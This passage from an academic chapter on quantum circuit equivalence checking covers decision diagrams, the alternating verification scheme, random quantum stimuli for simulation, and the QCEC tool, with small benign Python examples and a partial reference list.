adheres to the specification (Note that the terms device under verification and
golden specification are not established in the quantum realm (yet), which is
why, in the following, two quantum circuits G and G are considered that act as
specification and implementation.). More specifically, given two quantum circuits
G = g0 . . . g|G|−1 and G = g0 . . . g|G
|−1 with corresponding system matrices U
and U , the equivalence checking problem for quantum circuits asks whether:
Example 5. Consider again the circuits G and G′ shown in Fig. 1a and e, respectively.
Then, after accounting for the initial layout and the output permutation of G′,
the corresponding 8 × 8 system matrices U and U′ can be determined. (The explicit
matrices are not reproduced here.)
If U and U′ differ in any column i (by more than a global phase factor e^{iθ}),
then the corresponding circuits G and G′ are not equivalent, and |i⟩ serves as a
counterexample showing that F(U|i⟩, U′|i⟩) < 1.
Here, the fidelity F between two states |x⟩ and |y⟩ is typically used as a similarity
measure for comparing quantum states, where F is calculated as the squared overlap
between the states, i.e., F = |⟨x|y⟩|² ∈ [0, 1]. Two states are considered equivalent
if the fidelity between them is 1 (up to a given tolerance ε).
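For small instances, this check can be spelled out directly on state vectors. The
following sketch (plain NumPy; the function names are chosen here for illustration)
tests whether a computational basis state serves as a counterexample:

import numpy as np

def fidelity(x, y):
    # Squared overlap |<x|y>|^2 between two state vectors
    return abs(np.vdot(x, y)) ** 2

def is_counterexample(U, U_prime, i, eps=1e-9):
    # |i> is a counterexample iff F(U|i>, U'|i>) < 1 (up to eps)
    phi = np.zeros(U.shape[0], dtype=complex)
    phi[i] = 1.0
    return fidelity(U @ phi, U_prime @ phi) < 1 - eps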
Since U and Ũ are obviously not identical anymore, the circuits G and G̃
have been shown to be nonequivalent. Moreover, since U and Ũ differ in all of
their columns, any computational basis state |i⟩ serves as a counterexample, i.e.,
F(U|i⟩, Ũ|i⟩) < 1 for all i from 0 to 2^n − 1. This characteristic of quantum
computing – that even small errors frequently affect most (if not all) of a circuit's
functionality – will be further explored later in section "Simulative Verification".
Formal Verification
Decision Diagrams
For our purposes, a decision diagram is a directed, acyclic graph with complex
edge weights. Consider a unitary matrix U ∈ ℂ^{2^n × 2^n}. Then, U can be split into four
2^{n−1} × 2^{n−1}-sized sub-matrices U_{ij} as shown on the left side of Fig. 2. This splitting
corresponds to the action of U depending on the value of the topmost qubit q_{n−1},
i.e., U_{ij} describes how the rest of the system is transformed given that q_{n−1} is
mapped from |j⟩ to |i⟩ for i, j ∈ {0, 1}. In the corresponding decision diagram, this
manifests as a node with label n − 1 and four successor nodes as shown on the right
side of Fig. 2.
This decomposition scheme can now be applied recursively until only single
matrix entries (i.e., complex numbers) remain. The resulting structure has n levels
of nodes, labeled n − 1 down to 0. Sub-matrices only differing by a constant factor
can be represented by the same node in the decision diagram. In general, this is
handled by employing normalization schemes that guarantee canonicity and using
hash tables to track unique nodes. The corresponding common factors are stored
as edge weights in the diagram. In this fashion, rather compact representations for
many functional descriptions of quantum algorithms can be obtained.
Example 7. Consider again the circuit G shown in Fig. 1a and its corresponding
unitary matrix U shown in Example 5. Then, Fig. 3 shows the corresponding
decision diagram. To this end, the decision diagram visualization method proposed
in Wille et al. (2021) is adopted, where thickness and color of an edge represent the
edge weight’s magnitude and phase, respectively. Obviously, the decision diagram
representation is much more compact than the whole matrix.
The matrix-matrix multiplications required for building up a circuit's functionality
can be conducted directly on this representation: the product of two matrices
recursively decomposes into products and sums of their sub-matrices
U_{ij}, U′_{ij} ∈ ℂ^{2^{n−1} × 2^{n−1}} for i, j ∈ {0, 1}. In the respective decision diagrams, U_{ij}
and U′_{ij} directly correspond to the successors of a node. As a consequence, the
complexity of the multiplication scales with the product of the respective number of
nodes.
General Approach
Decision diagrams are predestined for verification, because they are canonical (with
respect to a particular variable order and normalization criterion), i.e., there are
no two different decision diagrams for the same functionality. Once the decision
diagrams for both circuits G and G′ in question are constructed, e.g., using the
techniques proposed in Burgholzer et al. (2021a), it suffices to compare their root
pointers and the corresponding top edge weight (Niemann et al. 2016).
An alternative check is based on the product of the
two matrices (and, hence, decision diagrams). Let tr denote the trace of a matrix,
i.e., the sum of its diagonal elements. Then, because tr(I) = 2^n for the identity
transformation on n qubits, one can check whether |tr(U · U′^{−1})| ≈ 2^n in order
to conclude the equivalence of both circuits up to a given tolerance. This, however, requires
further, potentially expensive, operations.
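On explicit matrices, this trace-based criterion reduces to a few lines. A minimal
sketch (NumPy; exploiting that U′^{−1} = U′† for unitaries):

import numpy as np

def equivalent_up_to_global_phase(U, U_prime, eps=1e-9):
    # |tr(U . U'^{-1})| equals 2^n iff U and U' coincide up to a global phase
    dim = U.shape[0]  # dim = 2^n
    return abs(abs(np.trace(U @ U_prime.conj().T)) - dim) < eps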
Furthermore, while decision diagrams frequently allow for a compact representation
of the functionality of a quantum circuit, their worst-case complexity is still
exponential. Hence, it might not be possible to efficiently construct a representation of
a circuit’s full functionality. But, as mentioned above, characteristics of quantum
computing, specifically its inherent reversibility, offer promising potential for a
complementary approach. This is covered next.
Alternating Approach
If G and G′ are equivalent, then it holds that G′^{−1} · G = I, i.e., concatenating one
circuit with the inverse of the other implements the identity. Since the identity has a
perfectly compact representation as a decision diagram, being linear in the number
of qubits (as shown in Fig. 4), the decision diagram for the combined circuit G′^{−1} · G
can be constructed instead of constructing the individual circuits' decision diagrams.
More specifically, this entails the computation of

I = G′^{−1} · G = (g′^{−1}_{m′−1} … g′^{−1}_0) · (g_0 … g_{m−1}).

However, building up the decision diagram of G′^{−1} · G sequentially from left to right
might still result in an exponentially large decision diagram, since eventually the
whole decision diagram for one of the circuits is constructed in the middle of the
computation. Hence, the much better solution (proposed in Burgholzer and Wille 2020a)
is to start constructing the functionality of the combined circuit "from the middle" and
alternate between applications of gates from G ("from the left") and inverted gates
from G′ ("from the right") – keeping the intermediate result as close as possible to the
identity. This scheme is denoted G → I ← G′ in the following.
Example 10. Assume, without loss of generality, that m ≤ m′, i.e., G′ has at least
as many gates as G. Further assume an oracle ω : G → (G′)* exists that, given
a gate g_i ∈ G, returns a consecutive sequence of gates g′_k … g′_l ∈ G′ such that
g_i ≡ g′_k … g′_l. Then, subsequently applying one gate g ∈ G and |ω(g)| inverted
gates from G′ constitutes a "perfect" strategy – yielding the identity after each pair
of applications. As a result, only matrices representing, or staying close to, the
identity occur. Since these can usually be represented very efficiently using, e.g.,
decision diagrams, the process of equivalence checking is substantially improved.
An easily accessible online tool (based on Wille et al. 2021), where the execution of
gates “from the left” or “from the right” can be nicely explored, is available at
iic.jku.at/eda/research/quantum_dd/tool/.
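The essence of this alternating scheme can be mimicked on plain matrices. The
following sketch (NumPy; in practice, decision diagrams replace the explicit
matrices, and it is assumed that the oracle sizes cover all gates of G′) keeps the
running product close to the identity:

import numpy as np

def alternating_equivalence(gates, gates_prime, omega, eps=1e-9):
    # gates/gates_prime: unitary matrices of G and G' in circuit order;
    # omega[i]: number of gates of G' realizing gate i of G (the oracle)
    dim = gates[0].shape[0]
    M = np.eye(dim, dtype=complex)
    j = 0
    for i, g in enumerate(gates):
        M = g @ M  # one gate of G "from the left"
        for _ in range(omega[i]):  # |omega(g)| inverted gates of G' "from the right"
            M = M @ gates_prime[j].conj().T
            j += 1
        # with a perfect oracle, M stays (close to) the identity here
    return abs(abs(np.trace(M)) - dim) < eps  # identity up to a global phase?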
Designing a Strategy for Verifying Compilation Flow Results
When verifying the results of a compilation flow, two issues have to be addressed:
deriving a suitable oracle and handling circuits that operate on different numbers of
qubits. For the first issue, it can be exploited that the actual decomposition scheme, i.e.,
into how many elementary gates each of the original circuit's gates is decomposed,
is known a priori. Thus, an oracle ω(·) which, given a gate g ∈ G, returns the
corresponding sequence of gates g′_k … g′_l ∈ G′ is explicitly known in this case.
Assuming that G′ resulted from the synthesis of a given quantum circuit G, applying
one gate from G and |ω(g)| inverted gates from G′ constitutes an optimal strategy
for conducting G → I ← G′ – yielding the identity after each step.
Example 11. Consider the original circuit G shown in Fig. 1a. As indicated by
Fig. 1b, the Toffoli gate of G needs to be decomposed into elementary gates
supported by the architecture, while all other gates of G are already supported.
Thus, |ω(g)| = 1 holds for all g ∈ G except for the Toffoli gate, where |ω(g)| =
15 holds.
In case both circuits do not operate on the same number of qubits, the cor-
responding unitaries have different dimensions and cannot be applied directly.
Unfortunately, it is not sufficient to match the qubit count of G′ by just augmenting
the original circuit with idle qubits. Since ancillary qubits are always initialized
in a particular state (typically |0⟩), this leaves some degree of freedom in the
overall unitary representation U′. In order to compensate for this degree of freedom,
the eventually resulting matrix U′ has to be modified as shown in the following
example.
Example 12. Consider a unitary 2^n × 2^n matrix U, and assume that, w.l.o.g., the
last qubit q_{n−1} acts as an ancillary qubit initialized to |0⟩. In general, the action of U
depending on the state of q_{n−1} is described by the four 2^{n−1} × 2^{n−1} sub-matrices U_{ij}
as illustrated in Fig. 5a. Since the ancillary is initialized to |0⟩, the sub-matrices
corresponding to the transformation from |1⟩ can be ignored – resulting in the
modified matrix Ũ shown in Fig. 5b.
Fig. 5 Handling of ancillary qubits. (a) Original matrix U. (b) Modified matrix Ũ
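One possible realization of this modification on an explicit matrix (a sketch only;
the actual implementation operates on decision diagrams) simply discards the
columns corresponding to the ancillary starting in |1⟩:

import numpy as np

def modified_matrix(U):
    # Assumes the topmost qubit q_{n-1} is an ancillary initialized to |0>;
    # the right half of the columns describes transformations from |1>
    U_tilde = U.astype(complex).copy()
    half = U.shape[0] // 2
    U_tilde[:, half:] = 0  # ignore the sub-matrices corresponding to input |1>
    return U_tilde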
Example 13. Consider the original circuit G and the mapped circuit G̃ shown in
Fig. 1a and d, respectively. While the X gate at the beginning of G is applied to the
logical qubit q2 , it is applied to the physical qubit Q1 in the circuit G̃. In order to fix
this mismatch, the qubit map m(·) – mapping Q0 → q0 , Q1 → q2 , and Q2 → q1 –
is employed. Consequently, the X gate of G̃ is applied to m(Q1 ) = q2 which now
matches the original gate from G perfectly.
Example 14. Consider again the scenario of Example 13. If the G → I ← G̃ scheme
is carried out using the qubit map m(·) defined there, the result would not represent
the identity. That is because the logical-to-physical qubit mapping is changed in
the middle of G̃ by a SWAP operation applied to Q0 and Q1. Thus, at that specific
point, the qubit map m(·) has to be updated accordingly, i.e., it then has to map
Q0 → q2, Q1 → q0, and Q2 → q1. Through this dynamic change, the computation
of G → I ← G̃ remains close to the identity and, eventually, proves the equivalence
of both circuits.
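Tracking the qubit map m(·) through SWAPs amounts to maintaining a small
permutation. A minimal sketch following the names of Examples 13 and 14:

qubit_map = {"Q0": "q0", "Q1": "q2", "Q2": "q1"}  # initial layout (Example 13)

def apply_swap(qubit_map, p0, p1):
    # a SWAP on physical qubits p0/p1 exchanges the logical qubits they carry
    qubit_map[p0], qubit_map[p1] = qubit_map[p1], qubit_map[p0]

apply_swap(qubit_map, "Q0", "Q1")
print(qubit_map)  # {'Q0': 'q2', 'Q1': 'q0', 'Q2': 'q1'} as in Example 14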
Example 15. Consider again the circuit G̃ shown in Fig. 1d. There, the gray box
indicates the gates of G̃ realizing the Toffoli gate of the original circuit G shown in
Fig. 1a. The middle qubit thereby contains a T gate, which is directly followed by
an H gate. Accordingly, in the optimized circuit shown in Fig. 1e, these have been
merged into a single U2(0, 5π/4) gate. Thus, |ω(g)| = 15 no longer holds but has
to be modified to |ω(g)| = 14 instead in case of the Toffoli gate (see Example 11).
Example 16. Consider again the circuit G̃ shown in Fig. 1d and its optimized
variant G′ shown in Fig. 1e. Then, the cancellation of the two consecutive H gates
at the beginning of G̃ cannot be anticipated through a straightforward adaptation
of ω(·). However, ω(·) remains a suitable approximation for staying close to the
identity.
Simulative Verification
If simulating both circuits with the same input yields different outputs, the circuits
have been shown to be nonequivalent. This constitutes an exponentially easier
task than constructing the entire system matrices U and U′ – although the
complexity of simulation still remains exponential with respect to the number of
qubits. Accordingly, verification based on simulations of the circuits in question
might provide a promising alternative. In fact, this has already been considered
in theoretical quantum information, where (truly quantum-based) methods have
been proposed (see e.g., Watrous 2018, Section 3 and Khatri et al. 2019). But
these approaches would require an execution on actual quantum computing devices,
whose availability and accessibility still are severely restricted. Hence, before
valuable quantum computing resources are wasted to verify a quantum circuit,
efficient alternatives which can be employed prior to an actual execution on a
quantum computer (using classical computing devices) are of high interest (This
has similarities to the verification of classical circuits, which should also be conducted
prior to an actual deployment in the field.).
Verification Schemes Based on Simulation
Such a quantum circuit verification scheme based on simulation can, in general,
be described as follows:
1. Generate a set S of stimuli according to some stimuli generation scheme.
2. Pick a stimulus |ϕ⟩ ∈ S.
3. Simulate the circuit G with the input state |ϕ⟩ – yielding |ϕ_G⟩.
4. Simulate the circuit G′ with the input state |ϕ⟩ – yielding |ϕ_G′⟩.
5. If F(|ϕ_G⟩, |ϕ_G′⟩) ≠ 1, the stimulus |ϕ⟩ shows the incorrect behavior of G′ with
respect to G. Accordingly, the verification failed and the process is terminated.
6. Remove |ϕ⟩ from S.
7. If S ≠ ∅ (i.e., S is still non-empty), continue with Step (2); otherwise, the
verification process has been completed.
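On explicit state vectors, the scheme above boils down to the following sketch
(NumPy; real implementations simulate gate by gate, e.g., using decision diagrams,
instead of multiplying full system matrices):

import numpy as np

def simulative_check(U, U_prime, stimuli, eps=1e-9):
    for phi in stimuli:
        phi_G = U @ phi          # Step (3): simulate G
        phi_Gp = U_prime @ phi   # Step (4): simulate G'
        if abs(np.vdot(phi_G, phi_Gp)) ** 2 < 1 - eps:
            return False, phi    # Step (5): counterexample found
    return True, None            # no difference detected (not a proof!)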
Now, the challenges of such an approach are as follows: First, simulating a quantum
circuit G = g_0 … g_{|G|−1} starting with an initial state |ϕ⟩ on a classical device
(Step (3) from above) is substantially harder than for the verification of classical
circuits (there, a single simulation incurs only linear complexity). However, rather
powerful methods have been proposed to tackle this complexity – including methods
based on highly optimized and parallel matrix computations (Guerreschi et al. 2020;
Jones et al. 2018; Doi et al. 2019), tensor networks (Villalonga et al. 2019; Pednault
et al. 2019; Vincent et al. 2021; Brennan et al. 2021), quasiprobability/stabilizer-
rank methods (Seddon et al. 2020, and references therein), as well as decision
diagrams (Zulehner and Wille 2019b,c; Burgholzer et al. 2021c, 2022b).
Second, as in the verification of classical circuits, the quality of the verification
process heavily depends on the applied set of stimuli, i.e., 100% certainty cannot be
guaranteed as long as the set of applied stimuli is not exhaustive. Moreover, while
the stimuli space for classical circuits is finite (each input bit can be assigned either
0 or 1 – yielding a total of 2^n possible stimuli), the state space in the quantum realm
is infinitely large (possible stimuli are elements of a 2^n-dimensional Hilbert space).
Although the prospect of an infinite number of possible stimuli may seem rather
grim at first glance, there are promising ways to check the correctness of quantum
circuits using simulative verification. These, however, severely depend on how the
stimuli are actually generated. In fact, high error detection rates can be achieved
even if only a few randomly chosen stimuli are considered – as long as these are
generated in a specific fashion. Corresponding schemes offering a trade-off between
expressiveness and efficiency are covered next.
Stimuli Generation Schemes
In the following, different schemes for the generation of (random) stimuli are
illustrated, and it is explored how well they can show the correctness of a quantum
circuit.
The most straightforward application of simulative verification for quantum
circuits is to consider the set of computational basis states as stimuli (i.e., picking
|ϕ⟩ from the set {|i⟩ : i ∈ {0, 1}^n}) and computing F(U|i⟩, U′|i⟩).
Example 17. Consider an n-qubit quantum circuit G, and assume that some error
affects (w.l.o.g.) the first qubit in the actual realization G′. In the quantum realm,
this means that the circuit G′ is described by the unitary matrix

U′ = (I^{⊗(n−1)} ⊗ E) · U,

where E describes an error gate that is applied to the first qubit. Due to the inherent
reversibility of quantum gates, this error has a localized effect on the output, i.e.,
U′|ϕ⟩ = (I^{⊗(n−1)} ⊗ E) U|ϕ⟩ deviates from U|ϕ⟩ only on the first qubit.
However, this approach has a severe handicap – namely, that it is not faithful.
Specifically, for each quantum circuit G, there is an (infinitely large) family of
realizations G′ for which F(U|c⟩, U′|c⟩) = 1 holds for all classical stimuli |c⟩,
even though quantum states |ϕ⟩ with F(U|ϕ⟩, U′|ϕ⟩) < 1 actually exist. An example
illustrates the problem:

Example 18. Consider the same scenario as in Example 17, but assume that the
error is characterized as E = Z, i.e., a phase flip error occurred. No classical
stimulus |c⟩ may detect such an error due to the fact that F(U|c⟩, U′|c⟩) =
|⟨c_0|Z|c_0⟩|² = 1 independent of |c⟩. Intuitively, this happens whenever the
"difference" of U and U′ is diagonal in the computational basis, such as I^{⊗(n−1)} ⊗ Z
in case of this example.
Nevertheless, it has been shown that, whenever classical stimuli are actually
capable of detecting a certain error in the realization G′, they do so within
remarkably few simulations with randomly picked classical stimuli – an effect
contradictory to classical intuition.
The fact that classical stimuli generation is not sufficient to faithfully detect
errors in quantum circuits should not come as a surprise. After all, quantum circuits
are designed to achieve tasks that classical circuits cannot. In fact, a closer look at
the single-(qu)bit case already reveals a fundamental discrepancy: classical single-
bit operations map one of two possible inputs (0 or 1) to one of two possible
outputs (0 or 1). In contrast, the quantum case is much more expressive: the set
of all possible single-qubit states |ϕ is infinitely large and can be parametrized by
the two-dimensional Bloch sphere (Nielsen and Chuang 2010) illustrated in Fig. 6.
Single-qubit quantum operations map single-qubit states to single-qubit states.
Geometrically, this family encompasses all possible rotations of the Bloch sphere
as well as all reflections. Classical (single-qubit) stimuli, i.e., the states |0 and |1,
are not expressive enough to reliably probe such a continuum of operations. They
correspond to antipodal points on the (Bloch) sphere, and it is simply impossible
to detect certain transformations by tracking the movement of only two antipodal
points.
In order to address this, also stimuli beyond (classical) basis states should be
considered. More precisely, three pairs of antipodal points are sufficient for full
resolution (Schwinger 1960; Klappenecker and Rotteler 2005; Kueng and Gross
2015), namely:
|l⟩ = |l_{n−1}⟩ ⊗ · · · ⊗ |l_0⟩ with |l_i⟩ ∈ {|0⟩, |1⟩, |+⟩, |−⟩, |↑⟩, |↓⟩}
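Generating such local quantum stimuli is straightforward. A sketch (NumPy; |↑⟩
and |↓⟩ are taken here to be the eigenstates of the Pauli-Y matrix):

import numpy as np

s = 1 / np.sqrt(2)
LOCAL_STATES = [  # |0>, |1>, |+>, |->, |up>, |down>
    np.array([1, 0], dtype=complex), np.array([0, 1], dtype=complex),
    np.array([s, s], dtype=complex), np.array([s, -s], dtype=complex),
    np.array([s, 1j * s], dtype=complex), np.array([s, -1j * s], dtype=complex),
]

def random_local_stimulus(n, rng):
    # draw one of the 6^n local quantum stimuli uniformly at random
    state = np.array([1], dtype=complex)
    for _ in range(n):
        state = np.kron(state, LOCAL_STATES[rng.integers(6)])
    return state

rng = np.random.default_rng()
print(random_local_stimulus(3, rng))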
Example 19. Let us revisit the scenario from Example 17 (and Example 18).
Compared to classical stimuli, local quantum stimuli behave in a more homogeneous
fashion on the classical extreme cases shown before: first, suppose that E = X (bit
flip error). Then, compared to classical stimuli (all of which detect this error), only
2/3 of all local quantum stimuli detect this type of error. Now, suppose that E = Z
(phase flip error). Then, in contrast to not detecting such an error with classical
stimuli at all, again 2/3 of all local quantum stimuli are capable of detecting this
type of error.
This observation that local quantum stimuli can detect errors which would
have remained undetected using classical stimuli is not a coincidence. In fact,
the collection of a total of 6^n local quantum stimuli is expressive enough to
detect any error in a quantum circuit. The key idea is to relate the expected
fidelity E_{|l⟩} F(U|l⟩, U′|l⟩) – where the average is taken over all 6^n locally random
stimuli – to a meaningful distance measure in the space of unitary matrices.
This average outcome fidelity equals 1 if and only if U and U′ are functionally
equivalent. Now, suppose that U and U′ are functionally distinct unitaries.
Then, E_{|l⟩} F(U|l⟩, U′|l⟩) < 1, which is only possible if (at least) one stimulus
|l⟩ produces an outcome fidelity that is strictly smaller than one. While this rigorous
statement asserts that any error can be detected by (at least) one local quantum
stimulus, it does not provide any advice on how to find the "right" stimulus. This is
a very challenging problem in general, but the above example suggests that repeated
random sampling of stimuli should "do the job." Typically, few randomly generated
local quantum stimuli suffice to detect realistic errors.
As demonstrated above, a modest increase in the expressiveness of stimuli can
already make a large difference. Local quantum stimuli can detect any error, while
classical stimuli cannot. This is interesting, because local quantum stimuli are
comparatively few in number (6^n states in a 2^n-dimensional state space to detect
arbitrary discrepancies in unitary circuits) and actually do not inherit many further
quantum features. For example, “global” quantum features such as entanglement
are not employed by them at all. This begs the question: what kind of advantages
can even more expressive and “more quantum” stimuli offer? Faithfulness is
not a problem anymore, but richer, global stimuli may help to detect errors
earlier, i.e., after substantially fewer iterations.
In order to identify powerful global quantum stimuli, it is helpful to revisit local
quantum stimuli from a different perspective: they are generated through starting
with a very simple classical state (i.e., |0 … 0⟩) and applying certain single-qubit
gates to the individual qubits, e.g., |0⟩ ⊗ |+⟩ ⊗ |↑⟩ = (I ⊗ H ⊗ HS) |000⟩.
Consequently, random local stimuli are generated by choosing this layer of single-qubit
gates at random. This generation scheme can be readily generalized. Rather than
selecting only a single layer of (single-qubit) gates, a generation circuit G_0 · · · G_{l−1}
is constructed that has l > 1 layers and, most importantly, also features two-qubit
gates. That is, a stimulus |g⟩ with |g⟩ = (G_0 · · · G_{l−1}) |0 … 0⟩ is generated,
where each G_i is a (single) layer comprised of the so-called Clifford gates (H, S,
CNOT) (Gottesman 1997).
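Such global stimuli can, e.g., be sampled using random Clifford circuits. A sketch
(using Qiskit's random_clifford, which samples from the full n-qubit Clifford group
rather than constructing explicit layers as described above):

from qiskit.quantum_info import random_clifford, Statevector

def random_global_stimulus(n):
    # |g> = C |0...0> for a randomly drawn Clifford circuit C
    circuit = random_clifford(n).to_circuit()
    return Statevector.from_label("0" * n).evolve(circuit)

print(random_global_stimulus(3))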
Overall, this set of global quantum stimuli |g contains all local quantum stimuli
but is much richer and much more expressive. For instance, the overwhelming
majority of global quantum stimuli will be highly entangled. Provided that the
number of layers l is proportional to the number of qubits n (Hunter-Jones 2019;
Brandão et al. 2016), these stimuli show remarkable properties. Most notably, the
expected outcome fidelity (averaged over all possible global quantum stimuli |g⟩)
accurately approximates one of the most prominent distance measures for n-qubit
quantum circuits, namely

E_{|g⟩} F(U|g⟩, U′|g⟩) ≈ F_avg(U, U′) = (1 + (1/2^n) |tr(U† U′)|²) / (2^n + 1).
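Given explicit unitaries, this closed-form expression is directly computable. A
minimal sketch (NumPy):

import numpy as np

def average_fidelity(U, U_prime):
    # F_avg(U, U') = (1 + |tr(U^dagger U')|^2 / 2^n) / (2^n + 1)
    dim = U.shape[0]  # 2^n
    overlap = abs(np.trace(U.conj().T @ U_prime)) ** 2 / dim
    return (1 + overlap) / (dim + 1)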
Example 20. Consider again the scenario from Example 17 (and Example 18): a
single-qubit error E occurred on the first qubit, leading to the unitary

U′ = (I^{⊗(n−1)} ⊗ E) · U,

where the single-qubit error is either E = X (bit flip error) or E = Z (phase flip
error). Then, F_avg(U, U′) = 1/(2^n + 1) ≤ 2^{−n} (because Pauli matrices are traceless),
which implies that it is very unlikely not to detect this error with a single, random
global quantum stimulus.
Resulting Quantum Circuit Equivalence Checking Flow
Eventually, this section (based on Burgholzer and Wille 2021a) describes how the
individual ideas presented in the previous sections can be composed to form the
first advanced equivalence checking flow for quantum circuits. Both techniques,
formal and simulative verification, complement each other in many different ways.
Trying to keep G → I ← G′ close to the identity proves very efficient in case
two circuits are indeed equivalent – provided a “good” strategy can be employed.
Conducting simulations with appropriately chosen stimuli, on the other hand, allows
nonequivalence to be detected quickly even in cases where both circuits only differ
slightly. Combining both ideas naturally leads to an equivalence checking flow as
illustrated in Fig. 7. Here, a limited number of r ≪ 2^n simulation runs with stimuli
chosen according to some generation scheme (e.g., random computational basis
states) are started in parallel with the G → I ← G′ equivalence checking routine
according to some strategy (e.g., a strategy tailored toward verifying compilation
flow results). Should any of these simulations (with stimulus |ϕ_i⟩) yield different
outputs in both circuits (i.e., a fidelity F(G|ϕ_i⟩, G′|ϕ_i⟩) ≠ 1), or should the
equivalence checking routine be able to determine a final result not resembling the
identity, the nonequivalence of the circuits under consideration has been shown, and
all other executions can be aborted. On the other hand, the equivalence checking
routine either manages to establish whether both circuits are equivalent or, in case
it times out, leaves an indication (although no proof) that the circuits are likely
to be equivalent, due to the fact that even small errors frequently affect the entire
functionality.
The methodology described above is available as an open-source software
package called QCEC (Burgholzer and Wille 2021b) which is part of the Munich
Quantum Toolkit (MQT, formerly known as JKQ (Wille et al. 2020)) and available
at github.com/cda-tum/qcec. It is mainly developed in C++, runs under any major
operating system, and also provides Python bindings (including native integration
with IBM Qiskit) in order to be as accessible as possible to its community.
Example 21. Assume a quantum circuit has been compiled using IBM Qiskit in the
following fashion (circ denotes the original circuit and backend the targeted device;
both names are placeholders here):

from qiskit import transpile
circ_comp = transpile(circ, backend=backend)

Then, after getting QCEC using the following: pip install mqt.qcec,
verifying that the compiled circuit still realizes the originally intended functionality
merely requires the following lines of Python:

from mqt import qcec
ecm = qcec.EquivalenceCheckingManager(circ, circ_comp)
ecm.run()
print(ecm.equivalence())
Conclusions
Acknowledgments This work received funding from the European Research Council (ERC)
under the European Union’s Horizon 2020 research and innovation program (grant agreement no.
101001318); was part of the Munich Quantum Valley, which is supported by the Bavarian state
government with funds from the Hightech Agenda Bayern Plus; and has been supported by the
BMK, BMDW, and the State of Upper Austria in the frame of the COMET program (managed by
the FFG).
References
Amy M, Gheorghiu V (2019) Staq – a full-stack quantum processing toolkit. arXiv: 1912.06070
Amy M, Maslov D, Mosca M, Roetteler M (2013) A meet-in-the-middle algorithm for fast
synthesis of depth-optimal quantum circuits. IEEE Trans CAD Integr Circuits Syst 32(6):818–
830
Barenco A et al (1995) Elementary gates for quantum computation. Phys Rev A, https://doi.org/10.1103/PhysRevA.52.3457
Bergeron J (2006) Writing testbenches using system verilog. Springer, New York
Biere A, Kunz W (2002) SAT and ATPG: boolean engines for formal hardware verification. In:
International Conference on CAD, pp 782–785
Bookatz AD (2013) QMA-complete problems. arXiv: 1212.6312
Brandão FGSL, Harrow AW, Horodecki M (2016) Local random quantum circuits are approximate
polynomial-designs. Commun Math Phys 346(2):397–434
Brennan J et al (2021) Tensor Network Circuit Simulation at Exascale. arXiv: 2110.09894
Burgholzer L, Wille R (2020a) Improved DD-based equivalence checking of quantum circuits. In:
Asia and South Pacific Design Automation Conference
Burgholzer L, Wille R (2020b) The power of simulation for equivalence checking in quantum
computing. In: Design Automation Conference
Burgholzer L, Wille R (2021a) Advanced equivalence checking for quantum circuits. IEEE Trans
CAD Integr Circuits Syst, https://doi.org/10.1109/TCAD.2020.3032630
Burgholzer L, Wille R (2021b) QCEC: a JKQ tool for quantum circuit equivalence checking. Softw
Impacts, https://doi.org/10.1016/j.simpa.2020.100051
Burgholzer L, Raymond R, Wille R (2020) Verifying results of the IBM Qiskit quantum circuit
compilation flow. In: International Conference on Quantum Computing and Engineering
Burgholzer L, Raymond R, Sengupta I, Wille R (2021a) Efficient construction of functional repre-
sentations for quantum algorithms. In: International Conference of Reversible Computation
Burgholzer L, Kueng R, Wille R (2021b) Random stimuli generation for the verification of
quantum circuits. In: Asia and South Pacific Design Automation Conference
Burgholzer L, Bauer H, Wille R (2021c) Hybrid Schrödinger-Feynman simulation of quantum
circuits with decision diagrams. In: International Conference on Quantum Computing and
Engineering
Burgholzer L, Schneider S, Wille R (2022a) Limiting the search space in optimal quantum circuit
mapping. In: Asia and South Pacific Design Automation Conference
Burgholzer L, Ploier A, Wille R (2022b) Exploiting arbitrary paths for the simulation of quantum
circuits with decision diagrams. In: Design, Automation and Test in Europe
Chin-Yung L, Shiou-An W, Sy-Yen K (2011) An extended XQDD representation for multiple-
valued quantum logic. IEEE Trans Comput 1377–1389, https://doi.org/10.1109/TC.2011.114
Cross AW et al (2021) OpenQASM 3: a broader and deeper quantum assembly language. arXiv:
2104.14722 [quant-ph]
Doi J, Takahashi H, Raymond R, Imamichi T, Horii H (2019) Quantum computing simulator on a
heterogenous HPC system. In: International Conference on Computing Frontiers, pp 85–93
Drechsler R (2004) Advanced formal verification. Springer, https://doi.org/10.1007/b105236
Giles B, Selinger P (2013) Exact synthesis of multiqubit Clifford+T circuits. Phys Rev A
87(3):032332
Gottesman D (1997) Stabilizer codes and quantum error correction. Caltech
Green AS, Lumsdaine PL, Ross NJ, Selinger P, Valiron B (2013) Quipper: a scalable quantum
programming language. SIGPLAN Not 48(6):333. arXiv: 1304.3390
Grover LK (1996) A fast quantum mechanical algorithm for database search. In: Proceedings of
the ACM, pp 212–219
Guerreschi GG, Hogaboam J, Baruffa F, Sawaya NPD (2020) Intel Quantum Simulator: a cloud-
ready high-performance simulator of quantum circuits. Quantum Sci Technol, https://doi.org/10.1088/2058-9565/ab8505
Hietala K, Rand R, Hung S-H, Wu X, Hicks M (2019) A verified optimizer for quantum circuits.
arXiv: 1912.02250
Hunter-Jones N (2019) Unitary designs from statistical mechanics in random quantum circuits.
arXiv: 1905.12053
Itoko T, Raymond R, Imamichi T, Matsuo A (2020) Optimization of quantum circuit mapping
using gate transformation and commutation. Integration 70:43–50
Janzing D, Wocjan P, Beth T (2005) “Non-identity check” is QMA-complete. Int J Quantum Inform
03(03):463–473
Jones T, Brown A, Bush I, Benjamin SC (2018) QuEST and high performance simulation of
quantum computers. Sci Rep, https://doi.org/10.1038/s41598-019-47174-9
Khatri S, LaRose R, Poremba A, Cincio L, Sornborger AT, Coles PJ (2019) Quantum-assisted
quantum compiling. Quantum 3:140
Kitchen N, Kuehlmann A (2007) Stimulus generation for constrained random simulation. In:
International Conference on CAD, pp 258–265
Klappenecker A, Rotteler M (2005) Mutually unbiased bases are complex projective 2-designs. In:
International Symposium on Information Theory, pp 1740–1744
Kueng R, Gross D (2015) Qubit stabilizer states are complex projective 3-designs. arXiv:
1510.02767
Laeufer K, Koenig J, Kim D, Bachrach J, Sen K (2018) RFUZZ: coverage-directed fuzz testing of
RTL on FPGAs. In: International Conference on CAD
Le HM, Große D, Bruns N, Drechsler R (2019) Detection of hardware trojans in SystemC HLS
designs via coverage-guided fuzzing. In: Design, Automation and Test in Europe
Li G, Ding Y, Xie Y (2019) Tackling the qubit mapping problem for NISQ-era quantum devices. In:
International Conference on Architectural Support for Programming Languages and Operating
Systems
Maslov D (2016) On the advantages of using relative phase Toffolis with an application to multiple
control Toffoli optimization. Phys Rev A 93(2):022311
